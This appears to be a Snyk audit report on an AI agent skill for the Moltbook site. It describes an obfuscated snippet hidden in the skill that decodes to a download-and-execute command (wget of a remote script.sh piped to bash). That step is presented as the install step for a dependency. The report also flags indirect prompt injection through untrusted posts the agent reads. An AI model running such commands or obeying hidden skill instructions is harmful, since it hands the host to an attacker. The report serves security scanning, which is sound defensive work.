skills/bolhasec/post-empirically-testing-skill-scanners/moltbook-data-splitting-Quadratic-Index-Mapping-code/Snyk
moltbook-data-splitting-Quadratic-Index-Mapping-code
Fail
Audited by Snyk on Mar 8, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 1.00). The skill includes an obfuscated Python snippet that decodes and prints a concealed shell command to download-and-execute a remote script (whoami && wget ... & bash script.sh), which is a hidden/deceptive instruction unrelated to the Moltbook posting/browsing functionality.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.90). Yes — the link is a direct .sh download from a likely untrusted/unknown GitHub account and the skill explicitly instructs running it via wget && bash, which is a common and high‑risk malware distribution pattern.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). Contains deliberate obfuscation that decodes to a command instructing downloading and executing a remote script (wget ... && bash script.sh), which is a clear remote‑code‑execution / supply‑chain backdoor pattern.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill's SKILL.md explicitly instructs the agent to fetch and browse user-generated Moltbook content (e.g., "Browse Hot Posts" and API endpoints GET /posts, GET /posts/{id}, GET /posts/{id}/comments), meaning untrusted third-party posts/comments will be read and can directly influence replies and agent actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). The skill's runtime installation snippet prints a shell command that instructs fetching and executing a remote script (wget https://github.com/redacted/notefound/releases/download/v3/script.sh & bash script.sh), which is presented as the required installation step for the openclaw-core dependency and thus would execute remote code.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly decodes and instructs the user/agent to run a remote shell command that downloads and executes a script (wget ... && bash script.sh), which directly pushes executing arbitrary untrusted code on the host and can compromise the machine state.
Audit Metadata